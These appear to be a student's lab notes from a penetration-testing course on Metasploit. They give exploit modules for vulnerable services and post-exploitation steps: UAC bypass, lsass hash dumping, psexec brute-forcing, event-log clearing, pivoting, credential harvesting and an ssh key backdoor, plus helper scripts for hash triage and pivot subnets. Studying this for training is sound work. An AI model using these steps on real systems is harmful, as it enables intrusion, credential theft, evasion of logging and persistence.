Metasploit Framework (MSF)
- windows http file server (Rejetto HFS)
  - use msf module
    exploit/windows/http/rejetto_hfs_exec
    (set RHOSTS and LHOST; the payload is fetched back from the attacker, so LHOST must be reachable from the target)
- windows java web server (Apache Tomcat)
  - exploit the tomcat (uploads a JSP through the HTTP PUT filter bypass)
    exploit/multi/http/tomcat_jsp_upload_bypass
- vulnerable ftp server
  - vsftpd 2.3.4 is backdoored (the module triggers the ":)" username backdoor, which opens a root shell on port 6200)
    exploit/unix/ftp/vsftpd_234_backdoor
- vulnerable file sharing service (Samba)
  - exploit the samba server (the module uploads a shared library to a writable share and makes the server load it, so a writable share is required; set SMB_SHARE_NAME if it cannot find one itself)
    exploit/linux/samba/is_known_pipename
- vulnerable ssh server (libssh)
  - msf module (an auxiliary scanner, not an exploit: it authenticates without a password and runs whatever is in the CMD option on the host)
    auxiliary/scanner/ssh/libssh_auth_bypass
- vulnerable smtp server
  - haraka mail server
    exploit/linux/smtp/haraka
    set SRVPORT 9898
    set email_to root@attackdefense.test
    set payload linux/x64/meterpreter_reverse_http
    (email_to must be an address the server accepts for delivery, otherwise the poisoned attachment is never processed; SRVPORT is where the exploit serves the payload from and must be reachable from the target)
- meterpreter basics
  - check the php file and realise xdebug is enabled (remote_connect_back lets any client attach the debugger and run code), use
    exploit/unix/http/xdebug_unauth_exec
  - available commands
    pwd, ls, lpwd, lls, edit, cat, download, unzip, rm, checksum, getenv PATH, search -d /usr/bin -f *ckdo*, lcd, upload
    (lpwd, lls and lcd act on the attacker machine; the rest act on the target)
- upgrading shells to meterpreter
  - exploit samba again
    exploit/linux/samba/is_known_pipename
    to get a shell, then upgrade it to meterpreter with
    post/multi/manage/shell_to_meterpreter
    (set SESSION to the shell session id; `sessions -u <id>` from msfconsole runs the same module)
- windows post exploitation
  - exploit hfs first to get a shell
    exploit/windows/http/rejetto_hfs_exec
  - post exploitation using (each module takes SESSION)
    post/windows/gather/win_privs
    post/windows/gather/enum_logged_on_users
    post/windows/gather/checkvm
    post/windows/gather/enum_applications
    post/windows/gather/enum_computers
    post/windows/gather/enum_shares
- uac bypass, msf memory injection
  - exploit the hfs server
    exploit/windows/http/rejetto_hfs_exec
  - migrate to a privileged process (the pid comes from the ps output; 2124 and 484 below are the lab's values)
    ps -S explorer.exe
    migrate 2124
    getsystem
  - getsystem fails from a medium-integrity (UAC-limited) admin session; in that case background the session and use the memory-injection UAC bypass (set SESSION; the payload architecture must match the target)
    exploit/windows/local/bypassuac_injection
  - from the new high-integrity session run getsystem, migrate into lsass (needs SYSTEM) and dump the hashes
    ps -S lsass.exe
    migrate 484
    hashdump
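Added example, not from the lab notes: a shell triage of the hashdump output. It flags accounts whose NT hash is the empty-password hash (log in with a blank password, no cracking needed) and accounts that still store a real LM hash (trivially crackable), and emits everything else in user:hash form for hashcat. The sample hashdump lines are constructed; the two constants are the standard hashes of an empty password.

```shell
#!/usr/bin/env sh
# Added example for triaging meterpreter `hashdump` output (not from the lab notes).
# hashdump prints pwdump-format lines:  user:RID:LM_hash:NT_hash:::
# These two constants are the well-known hashes of an empty password.
EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT="31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample output (hash values are illustrative, not from any real host).
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::'

# lowercase a hex string so comparisons do not depend on hashdump's casing
lc() { printf '%s' "$1" | tr 'A-F' 'a-f'; }

# triage_hashdump: stdin = hashdump lines; stdout = "<user> <rid> <flags>"
#   EMPTY_PASSWORD  NT hash is the empty-password hash
#   LM_PRESENT      a real LM hash is stored (14 chars max, case-folded, two 7-byte halves)
#   ok              neither applies
triage_hashdump() {
  while IFS=: read -r user rid lm nt rest; do
    [ -n "$user" ] || continue
    flags=""
    [ "$(lc "$nt")" = "$EMPTY_NT" ] && flags="EMPTY_PASSWORD"
    if [ "$(lc "$lm")" != "$EMPTY_LM" ]; then flags="${flags:+$flags,}LM_PRESENT"; fi
    printf '%s %s %s\n' "$user" "$rid" "${flags:-ok}"
  done
}

# nt_hashes_for_cracking: stdin = hashdump lines; stdout = "user:nthash" for every
# account that actually has a password, ready for `hashcat -m 1000 --username`.
nt_hashes_for_cracking() {
  while IFS=: read -r user rid lm nt rest; do
    [ -n "$user" ] || continue
    nt=$(lc "$nt")
    [ "$nt" != "$EMPTY_NT" ] || continue
    printf '%s:%s\n' "$user" "$nt"
  done
}

# Usage: paste the hashdump output into a file, then
#   triage_hashdump < hashes.txt ; nt_hashes_for_cracking < hashes.txt > nt.txt
printf '%s\n' "$SAMPLE_HASHDUMP" | triage_hashdump
```

On the constructed sample this reports Guest as EMPTY_PASSWORD and legacy as LM_PRESENT; only Administrator and legacy are worth sending to the cracker. An "empty" LM column is the normal case on anything after XP/2003, since LM storage is off by default.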
- exploiting smb with psexec
  - msf module to bruteforce
    auxiliary/scanner/smb/smb_login
    set USER_FILE, PASS_FILE, RHOSTS and VERBOSE
  - msf module to gain access with a found credential (the account must be a local admin and the ADMIN$ share reachable)
    exploit/windows/smb/psexec
    set RHOSTS, SMBUser and SMBPass
- windows enable remote desktop
  - exploit the badblue
    exploit/windows/http/badblue_passthru
  - enable rdp with the post module (set SESSION; USERNAME/PASSWORD optionally add an account to log in with)
    use post/windows/manage/enable_rdp
- clearing windows event logs
  - it's just
    clearev
    (wipes the Application, System and Security logs; clearing the Security log itself leaves event 1102 "The audit log was cleared", so this is noisy rather than stealthy)
- pivoting
  - exploit the hfs
    use exploit/windows/http/rejetto_hfs_exec
  - add a route through the session with autoroute (the subnet is the internal network the compromised host can reach)
    run autoroute -s 10.0.16.0/20
    (same thing as a module: post/multi/manage/autoroute with SUBNET and SESSION; verify with route print)
  - port forwarding in metasploit with
    portfwd add -l 1234 -p 80 -r demo2.ine.local
    and check the list with
    portfwd list
    (the internal host's port 80 is now reachable on the attacker's localhost:1234)
  - exploit the badblue on the internal server (msf modules use the added route, so RHOSTS can be the internal address directly)
    exploit/windows/http/badblue_passthru
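Added example, not from the lab notes: rather than taking 10.0.16.0/20 on faith, derive the subnets to route from the pivot host's own interfaces. The functions parse the text meterpreter's `ipconfig` prints (the sample below is constructed), compute network/prefix from address and netmask, reject non-contiguous masks, and print one `run autoroute -s` line per non-loopback IPv4 interface. Written for POSIX sh.

```shell
#!/usr/bin/env sh
# Added example (not from the lab notes): derive the subnet for `run autoroute -s`
# from the pivot host's interfaces instead of guessing it.
# Input is the text meterpreter's `ipconfig` prints; this sample is constructed.

SAMPLE_IPCONFIG='Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:aa:bb:cc
MTU          : 1500
IPv4 Address : 10.0.16.5
IPv4 Netmask : 255.255.240.0'

# dotted quad <-> 32-bit integer
ip2int() {
  local IFS=.
  set -- $1
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}
int2ip() {
  echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# mask2prefix 255.255.240.0 -> 20 ; returns 1 on a non-contiguous mask
mask2prefix() {
  local m inv n
  m=$(ip2int "$1")
  inv=$(( (~m) & 4294967295 ))
  # a contiguous mask inverts to 2^k - 1, so inv & (inv + 1) must be zero
  [ $(( inv & (inv + 1) )) -eq 0 ] || return 1
  n=0
  while [ "$m" -ne 0 ]; do n=$(( n + (m & 1) )); m=$(( m >> 1 )); done
  echo "$n"
}

# cidr_from_ip_mask 10.0.16.5 255.255.240.0 -> 10.0.16.0/20
cidr_from_ip_mask() {
  local ip mask prefix
  ip=$(ip2int "$1"); mask=$(ip2int "$2")
  prefix=$(mask2prefix "$2") || return 1
  printf '%s/%s\n' "$(int2ip $(( ip & mask )))" "$prefix"
}

# autoroute_cmds: stdin = `ipconfig` output; stdout = one autoroute command per
# non-loopback IPv4 interface, ready to paste into the meterpreter session.
autoroute_cmds() {
  local line addr=""
  while IFS= read -r line; do
    case "$line" in
      *"IPv4 Address"*) addr=${line#*: } ;;
      *"IPv4 Netmask"*)
        case "$addr" in
          ""|127.*) ;;
          *) printf 'run autoroute -s %s\n' "$(cidr_from_ip_mask "$addr" "${line#*: }")" ;;
        esac
        addr="" ;;
    esac
  done
}

# Usage: save the session's ipconfig output to a file and run  autoroute_cmds < ipconfig.txt
printf '%s\n' "$SAMPLE_IPCONFIG" | autoroute_cmds
```

For the constructed sample this prints exactly `run autoroute -s 10.0.16.0/20`, the route the notes use; the loopback interface is skipped. The same functions work on Linux `ifconfig`-style output if you adjust the two `case` patterns.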
- linux post exploitation lab I
  - exploit using
    use exploit/linux/samba/is_known_pipename
  - gather configuration files
    use post/linux/gather/enum_configs
  - gather environment variables
    use post/multi/gather/env
  - gather network settings
    use post/linux/gather/enum_network
  - check system protections (firewall, hardening and security software on the box)
    use post/linux/gather/enum_protections
  - gather system info
    use post/linux/gather/enum_system
  - check if inside a container
    use post/linux/gather/checkcontainer
  - check if inside a vm
    use post/linux/gather/checkvm
  - check user history files
    use post/linux/gather/enum_users_history
  - spawn other types of shell from the session
    use post/multi/manage/system_session
  - download a file onto the target and execute it (not a download to the attacker; use meterpreter's download for that)
    use post/linux/manage/download_exec
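Added example, not from the lab notes and not the code of the checkcontainer or checkvm modules: the kind of indicators those two checks rely on, as shell functions you can run from a plain shell (for instance right after the samba exploit, before upgrading to meterpreter). File paths are arguments so the functions can be exercised on constructed files; the demo runs them on constructed input and then on the real paths of the current host.

```shell
#!/usr/bin/env sh
# Added example (not from the lab notes, not the modules' own code): container and
# hypervisor indicators as plain shell, usable from any shell on the target.

# detect_container CGROUP_FILE DOCKERENV_PATH
#   Real arguments: /proc/1/cgroup /.dockerenv
#   Prints docker | kubernetes | lxc | none
detect_container() {
  cgroup_file=$1; dockerenv=$2
  if [ -e "$dockerenv" ]; then echo docker; return 0; fi
  if [ -r "$cgroup_file" ]; then
    if grep -q -E '/docker[/-]' "$cgroup_file"; then echo docker; return 0; fi
    if grep -q 'kubepods' "$cgroup_file"; then echo kubernetes; return 0; fi
    if grep -q -E '/lxc[/.]' "$cgroup_file"; then echo lxc; return 0; fi
  fi
  echo none
}

# detect_vm SYS_VENDOR_FILE
#   Real argument: /sys/class/dmi/id/sys_vendor (readable without root on most distros)
#   Prints vmware | virtualbox | qemu/kvm | xen | hyper-v | physical/unknown
detect_vm() {
  vendor=$(cat "$1" 2>/dev/null || true)
  case "$vendor" in
    *VMware*)                      echo vmware ;;
    *"innotek GmbH"*|*VirtualBox*) echo virtualbox ;;
    *QEMU*)                        echo qemu/kvm ;;
    *Xen*)                         echo xen ;;
    *"Microsoft Corporation"*)     echo hyper-v ;;
    *)                             echo physical/unknown ;;
  esac
}

# demo: constructed inputs in a temp dir, then the real paths on this host
demo() {
  t=$(mktemp -d)
  printf '12:pids:/docker/5e1f0c1c9a5b4d3e2f1a0b9c8d7e6f5a\n' > "$t/cgroup_docker"
  printf '0::/init.scope\n' > "$t/cgroup_host"
  printf 'VMware, Inc.\n' > "$t/vendor_vmware"
  echo "constructed docker cgroup : $(detect_container "$t/cgroup_docker" "$t/absent")"
  echo "constructed host cgroup   : $(detect_container "$t/cgroup_host" "$t/absent")"
  echo "constructed vmware vendor : $(detect_vm "$t/vendor_vmware")"
  echo "this host, container      : $(detect_container /proc/1/cgroup /.dockerenv)"
  echo "this host, hypervisor     : $(detect_vm /sys/class/dmi/id/sys_vendor)"
  rm -rf "$t"
}
demo
```

A "none"/"physical" answer is not proof: cgroup v2 hosts show only `0::/` for PID 1, and DMI can be hidden from unprivileged users, so treat these as quick hints and let the msf modules (which check more sources) confirm.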
- privilege escalation, rootkit scanner
  - a vulnerable rootkit scanner, chkrootkit (versions before 0.50 execute /tmp/update as root during a scan), found running via
    ps -aux
  - exploit using (set SESSION; the module drops the payload as /tmp/update and then waits for the scheduled root run of chkrootkit, so it is not instant)
    use exploit/unix/local/chkrootkit
- linux post exploitation lab II
  - gather ssh credentials (keys and known_hosts from home directories)
    use post/multi/gather/ssh_creds
  - gather docker credentials
    use post/multi/gather/docker_creds
  - dump hashes (needs root; reads /etc/passwd and /etc/shadow)
    use post/linux/gather/hashdump
  - extract ecryptfs folders which may hold credentials
    use post/linux/gather/ecryptfs_creds
  - extract wifi pre-shared keys
    use post/linux/gather/enum_psk
  - extract xchat config and logs
    use post/linux/gather/enum_xchat
  - extract phpmyadmin credentials
    use post/linux/gather/phpmyadmin_credsteal
  - extract pptpd CHAP secrets (VPN credentials)
    use post/linux/gather/pptpd_chap_secrets
  - create ssh key backdoor
    use post/linux/manage/sshkey_persistence
- establishing persistence on linux
  - create ssh key backdoor (adds an attacker key to authorized_keys for the current user, or for all users when the session is root)
    use post/linux/manage/sshkey_persistence
- port scanning and enumeration with armitage
  - GUI for metasploit; click
    open shell
- exploitation and post exploitation with armitage
  - GUI for metasploit; open meterpreter and dump hashes